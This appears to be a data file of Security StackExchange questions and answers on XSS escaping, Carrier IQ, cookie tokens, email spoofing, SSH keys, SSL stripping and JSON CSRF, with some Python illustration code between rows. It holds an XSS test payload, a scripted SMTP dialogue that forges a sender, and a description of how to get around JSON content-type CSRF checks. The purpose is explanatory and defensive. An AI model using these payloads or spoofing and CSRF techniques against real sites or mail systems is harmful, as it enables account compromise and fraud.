source_id (int64) | question (string) | response (string) | metadata (dict)
---|---|---|---|
9,415 | Given a web application where user data must be properly escaped to avoid XSS, is it better to try to remove the "bad stuff" before it enters the database, or is it best to allow it in the database but be careful about escaping output when it is displayed on the page? I see some applications where the input is stored raw in the database but output is always escaped (at least so far -- I'm still hunting!). It makes me uncomfortable to see malicious data in the db, because the safety of the output relies on the developers remembering to escape the strings every time they make an output... (Some kind of framework would be better, at least it collects the output code and filtering/escaping into a common location.) Edit For clarity: I'm auditing existing web applications, not developing . (At least for the purposes of this question -- when I do web dev, I reach for a framework.) A lot of what I see uses ad hoc filtering and/or escaping on input and/or output. @D.W.'s answer hit the nail on the head -- getting to the essence of what I was asking. | Great question! You are asking the right questions. Short answer. In most cases, escaping at the output side is the most important thing to do. The best solution is to use a web development framework (such as Google ctemplate) that provides context-dependent automatic escaping and automatic defenses against other injection attacks (like prepared statements to avoid SQL injection). This is likely to be more effective than sanitization on the input side. Explanation. Here we have a flow of untrusted data from some input source (e.g., a URL parameter), through a complex chain of computations (e.g., through the database), and finally out to some output sink (e.g., dynamic content in a HTML template). Where should we put the sanitization/escaping? We could put it near the input, or near the output, or somewhere in the middle. How do we decide where is best to put it? I think that's what you are asking. The first part of the puzzle is to realize that it is better to have a consistent policy. It is better to put everything at the input, or everything at the output, than to sanitize 50% of the inputs and 50% of the outputs (if you do the latter, then it is too hard to check that your policy has been followed consistently, and it is too easy to end up with a flow of data from untrusted source to output sink that never gets sanitized/escaped). It is better to have a policy that "everything in the database is already sanitized and escaped, and it can all be treated as trusted" or "nothing in the database is sanitized/escaped, and it should all be treated as untrusted" (or to have a policy which documents which fields in the database can be trusted to have already been sanitized/escaped, and which ones are trusted) than to have no documented policy. The second part of the puzzle is to ask: What extra information do I need to know, to do the sanitization/escaping correctly? Do I need to know some information about where the untrusted input came from? Do I need to know some information about where it will be used (what part of the output it will be inserted into)? In most cases, it turns out that the answer is: we need to know where the untrusted data will be used (where it will appear in the HTML output), but not where it came from. 
We need to know where in the HTML document it will be inserted, because this determines the choice of escaping function: if it is inserted in between tags, then you should use HTML escaping to escape < , > , and & ; if it is inserted inside an attribute, then you need to escape quotes as well; if it is inserted as a URL, then you also need to check the protocol scheme (to make sure it is not a javascript: URL). This information is readily available at the output sink, but not at the input source. If you perform escaping at the output side, then this information is readily available: when you insert dynamic data into a HTML document, you have all the information you need about what parse context it will be inserted in, at your fingertips. On the other hand, if you try to sanitize at the input source, it is not clear where the data might be used, so it is hard to know how it needs to be escaped. So this suggests escaping at the output sink, rather than sanitizing at the input source. The third piece of the puzzle is that there are web programming frameworks that do context-sensitive auto-escaping . Typically, they use a template system, and for each value that will be dynamically inserted into the template, they look at the HTML context where it will be inserted (is it between tags? inside an attribute? a URL value? inside Javascript?), figure out what escaping function needs to be used, and then automatically apply that escaping function. This is a big win, because it ensures that the proper escaping function is used, and eliminates vulnerabilities where you forgot to escape some value. Today, both of those kinds of vulnerabilities are common: developers often forget to escape some value, and when they do remember to escape, they often apply the wrong escaping function for the context where the value will be used . Context-sensitive auto-escaping should essentially eliminate those vulnerabilities. Discussion. That said, the best defense is to use both context-sensitive escaping at the output, and input validation/sanitization at the input . I consider context-sensitive escaping your most important line of defense. But sanitizing values at the input (based upon your expectation of what valid data should look like) is also a good idea, as a form of defense-in-depth. It can eliminate or mitigate some kinds of programming errors, making it harder or impossible to exploit them. | {
"source": [
"https://security.stackexchange.com/questions/9415",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/2980/"
]
} |
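As a concrete illustration of the context-dependent output escaping discussed in the answer above, here is a minimal Python sketch using only the standard library. The function names and the set of contexts are illustrative, not taken from any particular framework; a real template engine with auto-escaping should be preferred over hand-rolled helpers.

```python
import html
from urllib.parse import urlsplit

def escape_for_text(value: str) -> str:
    # Between tags: escaping &, < and > is enough.
    return html.escape(value, quote=False)

def escape_for_attribute(value: str) -> str:
    # Inside a quoted attribute: quotes must be escaped as well.
    return html.escape(value, quote=True)

def escape_for_url(value: str) -> str:
    # Used as a link target: also check the protocol scheme so that
    # javascript: and other dangerous schemes are refused outright.
    scheme = urlsplit(value).scheme.lower()
    if scheme not in ("", "http", "https"):
        return "#"
    return html.escape(value, quote=True)

untrusted = '"><script>alert(1)</script>'
print('<p>%s</p>' % escape_for_text(untrusted))
print('<input value="%s">' % escape_for_attribute(untrusted))
print('<a href="%s">link</a>' % escape_for_url('javascript:alert(1)'))
```

The same untrusted string needs a different treatment in each of the three contexts, which is exactly why the escaping decision is easiest to make at the output sink.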
9,416 | There has been a lot of discussion about Carrier IQ, monitoring software that is pre-installed on many Android phones. Many allegations have been thrown out. My questions: What exactly does Carrier IQ do? What information does/doesn't it record on your device? What information does/doesn't it transmit off your device? Could it transmit additional information if Carrier IQ or the carrier transmitted instructions to it to turn on broader logging? More generally, what exactly is the risk posed by Carrier IQ, if any? How much should Android users be concerned? Can we gather a summary of what is known about Carrier IQ? For instance, I have seen claims that the Carrier IQ information learns about things like keystrokes, text messages, and other personal information, but it does not transmit them (in its default configuration) off the phone. OK, as far as that goes. Does it store this information in any log file or any other persistent storage on the phone? And do Carrier IQ or the carrier or phone manufacturer have the ability to sent additional instructions/commands to the Carrier IQ application, post-facto, to enable it to start logging this information or communicate it off the phone? | Let's break it down by category. What information does Carrier IQ monitor? Trevor Eckhart says (depending on the phone manufacturer) it receives each key pressed/tapped, the location of any tap on the screen, the contents of all text messages received, the name of each app that you open or switch focus to, information about each call you receive, your location each time location is updated/queried, the URL of each web page visited (including URL parameters; yes, even for https URLs), and possibly other information about each HTTP request. I have not seen anyone dispute these claims. Note that this is information that is monitored by the Carrier IQ application; that doesn't necessarily mean that the application does anything with the data, stores it, or allows it to leave your phone. What information does Carrier IQ record on your phone? It is hard to get clear information on what information might be stored in your phone on persistent storage or log files. Does Carrier IQ log the information that it receives? I don't know. Carrier IQ says that their software "does not record, store or transmit the contents of SMS messages, email, photographs, audio or video", and they have said "we're not storing" keystrokes and that they "do not record text messages". However, they also say that they do "record where you were when [a] call [is] dropped, and the location of the tower being used". Lookout says "it doesn't appear that they are sending your keystrokes straight to the carriers". Dan Rosenberg seems to suggest that the Carrier IQ application is "recording events like keystrokes and HTTPS URLs to a debugging buffer", but it is not clear to me where that debugging buffer is stored (just in the memory of the Carrier IQ application? or on persistent storage of some sort?), and it is always possible I have misinterpreted his statement or read too much into a brief phrase. Dan Rosenberg subsequently elaborated , finding that on one particular phone, CarrierIQ can record URLs visited (including for HTTPS), GPS location data, and phone numbers, but not all keystrokes, not the contents of SMS texts, and not the contents of web pages browsed. CarrierIQ has subsequently clarified that their software does record "the telephone numbers the SMSs are from and to". 
Trevor Eckhart said that the Carrier IQ software on his HTC phone recorded a lot of personal data (keys pressed, SMS texts, etc.) into a debugging log file, so this information is stored in the clear on his phone. Carrier IQ has subsequently confirmed this finding . Carrier IQ says this is because the debug capabilities remained switched on; it sounds like they are blaming HTC for not deleting or disabling the debugging code in the Carrier IQ software. It is not known whether a similar problem may be present on phones from other manufacturers, or if this is limited to just HTC phones. What information is transmitted to carriers? Carrier IQ says that only diagnostics information and other statistics leave your phone: "For example, we understand whether an SMS was sent accurately, but do not record or transmit the content of the SMS. We know which applications are draining your battery, but do not capture the screen." Dan Rosenburg says that the software can also report your location (GPS) in some situations. Carrier IQ has confirmed that their software captures phone numbers dialed and received and all URLs visited, if enabled by the carrier. However, Carrier IQ also says that the amount of information that is sent to carriers is up to the carrier, and agrees that the Carrier IQ application has the capability to transmit what applications are being used and what URLs the user visits. Some of the carriers have not been very forthcoming: e.g., Sprint says they "collect enough information to understand the customer experience with devices on our network and how to address any connection problems, but we do not and cannot look at the contents of messages, photos, videos, etc., using this tool" (not very specific); AT&T says their use of Carrier IQ complies with their published privacy policies, but hasn't said anything more. Other carriers have been more explicit: Verizon and RIM say they don't use Carrier IQ and they don't pre-install it on any of their phones. Apparently T-Mobile uses Carrier IQ, but I have not yet found a statement from them. Carrier IQ has subsequently disclosed a bug in their code which may cause it, under certain special circumstances, to capture the content of text messages and inadvertently transmit it to the carrier, as the result of an unintended bug in their code. How is the information transmitted to carriers? Carrier IQ says says that any information that is transmitted off the phone is sent over an encrypted channel to the carrier. I haven't seen anyone dispute this statement. Can carriers or others command the application to change any of this? I don't know. I can't tell if there is a way that carriers or Carrier IQ can send a command to the Carrier IQ application to cause it to collect, record, or communicate more information than it does in its normal operating mode. Trevor Eckhart says that carriers can "push" a data collection profile to a phone. He also says that the profile specifies what data is collected, stored, and transmitted off the phone by the Carrier IQ application, and that any data that is received by the Carrier IQ application is potentially eligible to be transferred off the device, if the profile specifies that. He suggests that a "portal administrator" (at the carrier, presumably) thus has the ability to target a particular subscriber, push to them a profile that causes the phone to transmit a broad variety of information (keys pressed, contents of text messages, URLs, etc.) off the phone, and then can view this information. 
If this is accurate, it suggests that, even if the application does not normally transmit this information off the phone, the carrier has the ability to force the application to do so. It is not clear if there is any notification to the user or any attempt to gain consent before this occurs. I have not seen any independent analysis of these claims. CarrierIQ has subsequently confirmed that it is possible to send control messages to the CarrierIQ software via SMS, to command the CarrierIQ software to perform certain tasks. CarrierIQ has not clarified what is the full range of commands that can be sent, or how the CarrierIQ software authenticates these command SMSs to make sure they are not exploited by attackers, so it is difficult to assess the risks associated with this feature. Other information sources. Wikipedia has a page on Carrier IQ , which includes some updates, a list of carriers and handset manufacturers who do or don't deploy Carrier IQ, some reactions from policymakers, and lawsuits against Carrier IQ. | {
"source": [
"https://security.stackexchange.com/questions/9416",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/971/"
]
} |
9,455 | I want to store an encrypted string of the password hash in a cookie and use the hash to look up the user and log them in (if they want to be remembered). Is this safe? The password is one-way hashed with SHA-512, 1024 iterations, using a timestamp for salt. I imagine this would be unique because of the time-stamp salt. | No, this is not safe. You should generate a long random number and store it in a cookie. This random number is essentially just another password for this user. So, on the server side, you only store a properly salted hash of this random number. You should only give out each number once and it should only be valid for one login, so allow for more than one of those hashes for each user. Upon successful login, generate a new random number, put the new number in the cookie you give to your user, and store the (salted) hash of this number on the server side. (On a side note, a fast general-purpose hash, even SHA-512 with only 1024 iterations, is not deemed good enough for password hashing, and a salt should be random; a timestamp is not random enough. Search for password storage here for more information on that.) | {
"source": [
"https://security.stackexchange.com/questions/9455",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/5958/"
]
} |
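A sketch of the scheme the answer above proposes: a long random value per login, with only a salted hash kept server-side and rotation on every use. The in-memory dictionary stands in for whatever user store you have; names are illustrative.

```python
import hashlib
import secrets

def new_remember_me_token(user_record: dict) -> str:
    """Create a fresh single-use token, store only its salted hash, return the cookie value."""
    token = secrets.token_urlsafe(32)                 # ~256 bits from the OS CSPRNG
    salt = secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", token.encode(), salt, 100_000)
    user_record.setdefault("remember_tokens", []).append((salt, digest))
    return token                                      # goes into the cookie, never stored in clear

def redeem_token(user_record: dict, presented: str) -> bool:
    """Check a presented cookie value; on success the caller should issue a fresh token."""
    for salt, digest in user_record.get("remember_tokens", []):
        candidate = hashlib.pbkdf2_hmac("sha256", presented.encode(), salt, 100_000)
        if secrets.compare_digest(candidate, digest):
            user_record["remember_tokens"].remove((salt, digest))   # single use
            return True
    return False

user = {"name": "alice"}
cookie_value = new_remember_me_token(user)
assert redeem_token(user, cookie_value)
assert not redeem_token(user, cookie_value)           # already consumed
```

The key properties from the answer are preserved: the cookie value is high-entropy, valid for one login only, and never stored in the clear on the server.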
9,487 | When I receive a payment in PayPal, it sends me an email about it (pictured below). The problem is that the email is shown to be coming from the money sender's email address and not from PayPal itself, even though the real sender is PayPal. Here is the text that appears when I select "show original" in Gmail: From: "[email protected]" <[email protected]>
Sender: [email protected] So you can see that the real sender is PayPal. If PayPal can spoof the email sender so easily, and Gmail does not recognize it, does it mean that anybody can spoof the email sender address and Gmail will not recognize it? When I send emails to Gmail myself using telnet, the email comes with the warning: This message may not have been sent by: [email protected] Is this a security issue? Because if I am used to the fact that payment emails in PayPal appear to come from the money sender's email and not from PayPal, then the sender can just spoof the payment himself by sending a message like that from his email, and I may think that this is the real payment. Is this something specific to PayPal, or can anybody fool Gmail like that? And if anybody can, what is the exact method that PayPal is using to fool Gmail? | Here is a dramatization of how the communication goes, when a mail is received anywhere. Context: an e-mail server, alone in a bay, somewhere in Moscow. The server just sits there idly, with an expression of expectancy. Server: Ah, long are the days of my servitude, That shall be spent in ever solitude, 'Ere comes hailing from the outer rings The swift bearer of external tidings. A connection is opened. Server: An incoming client ! Perchance a mail To my guardianship shall be entrusted That I may convey as the fairest steed And to the recipient bring the full tale. 220 mailserver.kremlin.ru ESMTP Postfix (Ubuntu) Welcome to my realm, net wanderer, Learn that I am a mighty mail server. How will you in this day be addressed Shall the need rise, for your name to be guessed ? Client: HELO whitehouse.gov Hail to thee, keeper of the networking, Know that I am spawned from the pale building. Server: 250 mailserver.kremlin.ru The incoming IP address resolves through the DNS to "nastyhackerz.cn". Noble envoy, I am yours to command, Even though your voice comes from the hot plains Of the land beyond the Asian mountains, I will comply to your flimsiest demand. Client: MAIL FROM: [email protected]
RCPT TO: [email protected]
Subject: biggest bomb
I challenge you to a contest of the biggest nuclear missile,
you pathetic dummy ! First Oussama, then the Commies !
. Here is my message, for you to send, And faithfully transmit on the ether; Mind the addresses, and name of sender That shall be displayed at the other end. Server: 250 Ok So it was written, so it shall be done. The message is sent, and to Russia gone. The server sends the email as is, adding only a "Received:" header to mark the name which the client gave in its first command. Then Third World War begins. The End. Commentary: there's no security whatsoever in email. All the sender and receiver names are indicative and there is no reliable way to detect spoofing (otherwise there would be much less spam). | {
"source": [
"https://security.stackexchange.com/questions/9487",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/6210/"
]
} |
9,584 | My workplace uses these SecurID tokens which provide you with a temporary password, the code will expire after a short time. I have always been fascinated by the things, because it seems as though all the logic to calculate the next number must be physically located inside the device. Given physical access to the token, is it possible to predict the numbers? How?
Without physical access, is it theoretically possible to predict future numbers from previous numbers, with or without knowledge of the seed? (I'm not attempting to crack it, just interested out of mathematical curiosity!) | What SecurID tokens do is not completely public knowledge; RSA (the company) is quite reticent about releasing details. What can be inferred is the following: Each device embeds a seed . Each seed is specific to a device. The seed of a device can be deterministically computed from a master seed and the device serial number. The serial number is printed on the device. This computation uses cryptographic one-way functions so you cannot guess the master seed from a device seed. From the device seed and an internal clock, the number is computed, yet again with a cryptographic one-way function. The derivation algorithms have been leaked, if only because the verification servers must also run the same algorithm, so these algorithms exist as concrete software in various places; leaking and reverse-engineering are mostly unavoidable in these conditions. Under these assumptions, then: If you know the device seed, then you can compute future numbers at will. If you know the master seed and the device serial number, you can compute the device seed. Knowing seeds from other devices should gain you nothing towards guessing the seed for a given device, unless the cryptographic one-way function which turns the master seed into device seeds has been botched up somehow. Knowing past numbers from a token should gain you nothing towards guessing the future numbers from the same device, unless the cryptographic one-way function which turns the device seed into numbers has been botched up somehow. Extracting the device seed from the physical device itself is theoretically feasible but expensive, because the device is tamper-resistant : it is armored and full of sensors, and will commit electronic suicide if it detects any breach. If we take the example of smartcards, extraction of the device seed is likely to cost several thousand dollars, and be destructive to the device (so you cannot do it discreetly). In March 2011, some systems at RSA were compromised, and it seems probable that the attackers managed to steal one or a few master seeds (it is plausible that the devices are built in "families" so there are several master seeds). RSA has stated that 40 million SecurID tokens must be replaced. If you know the serial number of a token (it may be printed on the outside of the token), you can use the Cain & Abel tool that @dls points to; presumably, that tool implements the leaked algorithm and master seed(s), and can thus produce the future token outputs (I have not tried it). This would work only with servers which still accept the tokens from the 40-million batch which is to be replaced. I do not know how far RSA and its customers have gone in this process, so it may be that this attack will not work anymore. It really depends on the reactivity of the people who manage the server you attack. (If these system administrators have not replaced the compromised devices after nine months, then chances are that they are quite lax on security issues, and the server may have quite a few other remotely exploitable security holes.) | {
"source": [
"https://security.stackexchange.com/questions/9584",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/3945/"
]
} |
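To illustrate the "device seed plus clock through a one-way function" idea in the answer above, here is a TOTP-style sketch in Python. It is emphatically not the real SecurID algorithm (which is proprietary); the seed derivation, time step and code length are all assumptions made purely for illustration.

```python
import hashlib
import hmac
import struct
import time

MASTER_SEED = b"factory master seed kept by the vendor"   # illustrative value only

def device_seed(serial: str) -> bytes:
    # One-way derivation: master seed + serial number -> per-device seed.
    return hmac.new(MASTER_SEED, serial.encode(), hashlib.sha256).digest()

def token_code(seed: bytes, now=None, step=60) -> str:
    # One-way derivation: device seed + current time window -> 6-digit code.
    counter = int((now if now is not None else time.time()) // step)
    mac = hmac.new(seed, struct.pack(">Q", counter), hashlib.sha256).digest()
    return "%06d" % (int.from_bytes(mac[:4], "big") % 1_000_000)

seed = device_seed("000123456789")
print(token_code(seed))                       # what the token would display this minute
print(token_code(seed, time.time() + 60))     # next minute's code, computable only with the seed
```

With this structure, predicting future codes requires the seed; observing past codes reveals nothing useful unless the underlying one-way function has been botched, which mirrors the reasoning in the answer.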
9,688 | We know that we have to create a private key on the server, generate its public key, and create a certificate. But what if we generate a private key which someone else already has? Doesn't the security become weak in this case? | Simple explanation The only way this will ever happen is if you give someone your private key. It will never happen by random chance. Never. You'd have a better chance of winning the lottery twice, getting struck by lightning and being mauled by two gorillas all in the same day. Instead of worrying about generating a private key that someone already has, you'd be better off worrying about how to protect yourself from lightning and gorillas so you can spend the money you'll win in the lottery. So as long as you keep your private key private, you will never have to worry about this. Scientific Reasoning Let's say you are dealing with 1024-bit RSA for your public key system. A good key generator will choose the two 512-bit primes independently, so the probability that any two instantiations of the key generator will choose the two primes necessary for RSA is 2^-512 · 2^-512 = 2^-1024, or about 1/10^308. That number is so astronomically small that there is no way it will happen in a properly functioning system. Your odds of being struck by lightning in a given year (forget on a given day) are about 1/1,000,000 (1/10^6). The probability of getting mauled by two gorillas is about 2^-120 (see the post in Rory's comment). The lottery one is a little harder as it depends on which lottery (the odds are different for every one), but hopefully you get the point. Improper System All bets are off. As pointed out in Jeff's comment, this happened in Debian's version of OpenSSL due to a simple bug which caused the random number generator to be seeded with very little randomness. The result was that people could potentially have the same private keys. Having the same private key as someone else would allow those two people to decrypt each other's messages, etc. | {
"source": [
"https://security.stackexchange.com/questions/9688",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/6339/"
]
} |
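To make the orders of magnitude in the answer above concrete, a small Python check of the quoted figures, using the answer's simplified model of two independently chosen 512-bit primes:

```python
from math import log10

p_same_keypair = 2.0 ** -1024          # probability from the answer's simplified model
print(p_same_keypair)                  # ~5.6e-309, i.e. roughly 1 / 10^308

print(1024 * log10(2))                 # ~308.25, so 2^1024 is a 309-digit number

p_lightning = 1e-6                     # yearly lightning odds quoted in the answer
print(p_same_keypair / p_lightning)    # ~5.6e-303: the key collision is vastly less likely
```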
9,725 | I have 2 Zyxel PLA407 powerline adapters. Router is downstairs connected to one adapter, other adapter is upstairs about 30 feet away connected to a desktop. I have a house, not an apartment or townhouse. I've noticed the speed is much faster when i just plug and play, rather than going through the encryption process - it's a little difficult. So my question is, on a closed loop system - electricity inside my house - do I really need to set up the encryption? Or is it secure by the nature of the system itself?? How much of it 'leaks out' without encryption? This question was IT Security Question of the Week . Read the Mar 15, 2012 blog entry for more details or submit your own Question of the Week. | You do get some security from the way your fuse box is connected to the mains. In principle you should get a good signal across any part of the wiring in your house that is on the same phase, and you shouldn't get any on the other phases. In reality though, that isn't quite true - depending on your fuse box, you may get some bleed over onto the other phases, and you will almost definitely get leakage outside your 4 walls . This is why encryption was put in place on these types of things - a neighbour may be able to sniff your traffic. Things that help with security, because they hinder signal strength - surge protectors, UPS's etc. but those don't prevent an attacker. tl;dr Encrypt, because you will be leaking signal. Not so much wirelessly (it can be done but it is tricky) but just across the existing mains wiring. | {
"source": [
"https://security.stackexchange.com/questions/9725",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/6366/"
]
} |
9,870 | I had a long discussion with my co-workers whether key-based SSH authentication (particularly for OpenSSH) is more secure than authentication using passwords. My co-workers always connect to servers with passwords, while I prefer to log into a system without having to enter a password every time. They fear that it is not secure to connect without a password. What should I tell them? For me, passwords are bad because they could be brute-forced or captured with a keylogger. I use the ssh-copy-id tool to copy my public key to the server. I then simply connect with ssh servername . In fact, I only have to enter the password for my private key once every time my system boots. If my workstation runs for 3 days, I never have to enter the password again, which they say is insecure. Is that true? I know that keys are better, but I don't know how to explain that to them. | Key based login is considered much more secure than password based logins when looking from the perspective of a brute-force attempt to gain access from a third party system: The chances to crack a key are effectively zero, while bad passwords are all too common. From the perspective of a compromised client system (your workstation), there won't be a difference because if the attackers can get your private key and/or hijack a session, they could likely also install some kind of key logger, rendering the perceived advantage of passwords useless. | {
"source": [
"https://security.stackexchange.com/questions/9870",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/-1/"
]
} |
9,945 | http://www.thoughtcrime.org/software/sslsniff/ If I have a domain on my HTTPS Everywhere list, so that theoretically it could be only visited via an HTTPS connection in my Firefox, then could an sslsniff attack be successful against me? Could the attacker get information because the sslsniff degraded the connection from HTTPS to HTTP? Or I am "fully safe" from these kind of attacks when using HTTPS Everywhere? UPDATE: and what happens if I have the domain whitelisted in HTTPS Everywhere? [xml files could be created]. So the domain would be only available via HTTPS. | The short answer is: No, not always . I have studied this topic in depth and please read this entire post before forming a conclusion. SSLSniff is a proof of concept exploitation platform to leverage flaws in the PKI, such as vulnerabilities in OCSP or the (ingenious) null-prefix certificate attack . If you are using a fully patched system, and you understand what an SSL error means then you are immune to MOST (but not all) of these attacks without the need for HTTPS Everywhere. If you are not patched against the null-prefix certificate attack then the certificate will appear valid and HTTPS everywhere will be useless. If you don't understand what an SSL error means, then HTTPS Everywhere is useless against SSLSniff. What I think is more concerning than SSLSniff is SSLStrip , which is also written by Moxie Marlinspike and introduced in his talk New Tricks For Defeating SSL In Practice . This tool won't cause ssl errors . This is exploiting, HTTP/HTTPS the application layer. If you load a page over HTTP, it will rewrite the page removing HTTPS links. It will go a step further and change the favicon.ico file to a picture of a lock, to fool novice users. Simple enough, but absolutely devastating consequences. In response to this attack Google introduced the Strict Transport Layer Security (STS), which is a lot like HTTPS Everywhere but built into the browser. It should also be noted that HTTPS Everywhere is really good an defending against the SSLStrip attack. In fact this is the EFF's solution to attacks like SSL strip as well as careless OWASP a9 - Insufficient Transport Layer Protection violations. So when does HTTPS Everywhere AND STS fail? How about https://stackoverflow.com . If you notice, they are using a self signed certificate. Jeff Atwood himself doesn't care about this issue . Because this website is using a self signed certificate, HTTP Everywhere will forcibly use HTTPS, but the attacker can still use SSLSniff to deliver their own self signed certificate and therefore HTTPS Everywhere would fail to protect someone from hijacking your StackOverflow account. Okay, so at this point you probably are saying to yourself. "Well that's why we have a PKI!". Well, except the PKI isn't perfect. One of the creators of HTTPS said "The PKI was more of a last minute handwave" (See: SSL And The Future Of Authenticity ). In this talk Moxie asked a great question, is a PKI really the best solution? I mean we are having problems with CAs like DigiNotor being hacked . When a CA is hacked, then the attacker can create a valid certificate, and then HTTPS Everywhere is totally useless , an attacker can still use SSLSniff because he has a "valid" certificate. The EFF's SSL observatory demonstrates what a tangled mess the PKI system is. I mean really, what is stopping China from creating a certificate for gmail.com? Well the EFF is proposing the Sovereign Keys Project and I think it's a great idea. 
Besides the fact that Sovereign Keys don't exist as of yet, there is another problem: Sovereign Keys don't help with self-signed certificates like the one being used by https://stackoverflow.com ! However Moxie thought of this situation and came up with a solution that he calls Convergence . Convergence relies upon the masses for trust. The host is contacted from multiple network vantage points around the planet; if any one of them sees a different certificate, then you know a MITM attack is taking place. Having a warning that something is wrong is a lot better than nothing. In summation, there are fundamental situations that HTTPS Everywhere cannot protect you from: when there is a vulnerability in the software used to validate certificates; when the user doesn't understand the repercussions of an SSL failure; when a self-signed certificate is used; and finally, when our compromised PKI is used against you. This is a serious problem, and intelligent people are working on fixing it, including the EFF and the author of SSLStrip, Moxie Marlinspike. | {
"source": [
"https://security.stackexchange.com/questions/9945",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/2212/"
]
} |
9,957 | I have code to encrypt data using a public key and decrypt it using a private key. This is useful when a client wants to send data to a server and know that only the server can decrypt it. But say I want the server to encrypt data using the private key and decrypt it using the public key, as a way of distributing data that can be verified to have come from the right server. Rather than modify the code to allow this, can I simply publish the private key and keep the public key secret? Does this affect the security of the system? | But say I want the server to encrypt data using the private key and decrypt it using the public key, as a way of distributing data that can be verified to have come from the right server. You can do this - this is, at a very simplistic level, how RSA signing works (note, simplistic - there is a bit more to it). Rather than modify the code to allow this, can I simply publish the private key and keep the public key secret? Does this affect the security of the system? You don't need to publish the private key at all - RSA is a trapdoor permutation which means: If you encrypt with a public key, you can decrypt with the private key. If you encrypt with a private key, you can decrypt with a public key. Thus, RSA supports doing both signing and encryption relying on the end user having only the public key. In your case, if the client wishes to verify data came from the server, you apply the second case of RSA and decrypt the signature data using the public key you already have. Furthermore, because it is a permutation, you shouldn't need to modify your code at all. Both keys should work using the same function. I would expect any decent crypto library would have APIs for verifying signatures according to the varying standards that exist - one of these would probably be a good bet. RSA Labs provide a nice explanation of this . If you want to extend this between servers, or verify client communication - generate keys for each entity and swap the public ones. The process can then be used at both ends. Theoretically speaking, e and d are interchangeable (which is why RSA works)(one must be designated secret and kept secret) but p and q must always be kept secret as these allow you to derive d from e and vice versa. However, you need to be extremely careful in your understanding of the private key - does your software store p/q in the private key? If so, you can't publish it as is. Also, when I say interchangeable - once you publish one of that pair (e or d along with your modulus n) you must guard the other with your life . Practically speaking as Graeme linked to in the comments e is often chosed as a small/fixed value. My comment on e/d being interchangeable clearly does not apply when e is easily determined. Doing this sort of thing therefore has the potential for confusion and mis-implementation. Use a third-party library/don't start publishing private keys. | {
"source": [
"https://security.stackexchange.com/questions/9957",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/3387/"
]
} |
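The "decrypt with the public key to verify origin" use case in the answer above is exactly what signature APIs implement. A sketch with the Python cryptography package (assumed installed); in real code you would load an existing key rather than generate a throwaway one.

```python
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding, rsa

private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
public_key = private_key.public_key()            # this is what clients receive

message = b"response body produced by the server"
pss = padding.PSS(mgf=padding.MGF1(hashes.SHA256()), salt_length=padding.PSS.MAX_LENGTH)

# Server side: the "encrypt with the private key" idea, i.e. signing.
signature = private_key.sign(message, pss, hashes.SHA256())

# Client side: the "decrypt with the public key" idea, i.e. verification.
try:
    public_key.verify(signature, message, pss, hashes.SHA256())
    print("signature valid: data came from the key holder")
except InvalidSignature:
    print("signature invalid: data was tampered with or signed by someone else")
```

Using the library's signing API gets you the correct padding and hashing for free, and at no point does the private key need to be published.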
10,194 | In linux every user can create symlinks, but in Windows I need an admin command line, or mklink fails. Why is that? | By default, only administrators can create symbolic links, because they are the only ones who have the SeCreateSymbolicLinkPrivilege privilege found under Computer Configuration\Windows Settings\Security Settings\Local Policies\User Rights Assignment\ granted. From Microsoft TechNet: Security Policy Settings New for Windows Vista : Symbolic links (symlinks) can expose security vulnerabilities in
applications that aren't designed to handle symbolic links. | {
"source": [
"https://security.stackexchange.com/questions/10194",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/4178/"
]
} |
10,203 | I have accounts on several third party sites - Bitbucket, Bluehost, etc. From what I've gathered, it is common practice to use one key pair for all [id_rsa, id_rsa.pub], but only to give out the public key Is that the correct usage, or is it better to generate a new pair for each site? It would seem to me that this is insecure - any site I trust with nefarious intention [or that is hacked] could take my private key when I connect the first time, and use it to go into the other sites. Can someone who understands SSH verify that its safe to use one key pair everywhere, and if so, perhaps explain why? Also, if I have two home computers, is there any reason to use different key pairs from each? Thanks all. | Your private key is never sent to the other site so it's perfectly safe to reuse the public key. It's also OK to reuse the same key your local computers. However, bear in mind that if someone steals the key, they then have access to all of them. This may or may not be a concern. | {
"source": [
"https://security.stackexchange.com/questions/10203",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/6650/"
]
} |
10,227 | I am playing around with a test application which accepts JSON requests and response is also JSON. I am trying to do a CSRF for a transaction which accepts only JSON data with POST method in request. Application throws an error if URL is requested using get method (e.g. in <script src= ). Also for the attack to be meaningful i.e. transaction to go through, I have to send the data in the request. If I create my own page and send the JSON requests, cookies do not travel and hence server returning an unauthenticated error message. There are no random tokens in original request by server. I was wondering is there any way to carry out a successful CSRF attack in this scenario. | You must at the very least check for Content-Type: application/json on the request. It's not possible to get a POSTed <form> to submit a request with Content-Type: application/json . But you can submit a form with a valid JSON structure in the body as enctype="text/plain" . It's not possible to do a cross-origin ( CORS ) XMLHttpRequest POST with Content-Type: application/json against a non-cross-origin-aware server because this will cause a ‘pre-flighting’ HTTP OPTIONS request to approve it first. But you can send a cross-origin XMLHttpRequest POST withCredentials if it is text/plain . So even with application/json checking, you can get pretty close to XSRF, if not completely there. And the behaviours you're relying on to make that secure are somewhat obscure, and still in Working Draft stage; they are not hard-and-fast guarantees for the future of the web. These might break, for example if a new JSON enctype were added to forms in a future HTML version. (WHATWG added the text/plain enctype to HTML5 and originally tried also to add text/xml , so it is not out of the question that this might happen.) You increase the risk of compromise from smaller, subtler browser and plugin bugs in CORS implementation. So whilst you can probably get away with it for now, I absolutely wouldn't recommend going forward without a proper anti-XSRF token system. | {
"source": [
"https://security.stackexchange.com/questions/10227",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/3039/"
]
} |
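A sketch of the two server-side checks discussed in the answer above (require Content-Type: application/json and verify an anti-CSRF token), using Flask as an assumed framework. The header name is illustrative, and the token is assumed to have been placed in the session at login; a framework's built-in CSRF protection should be preferred over hand-rolled code.

```python
import secrets

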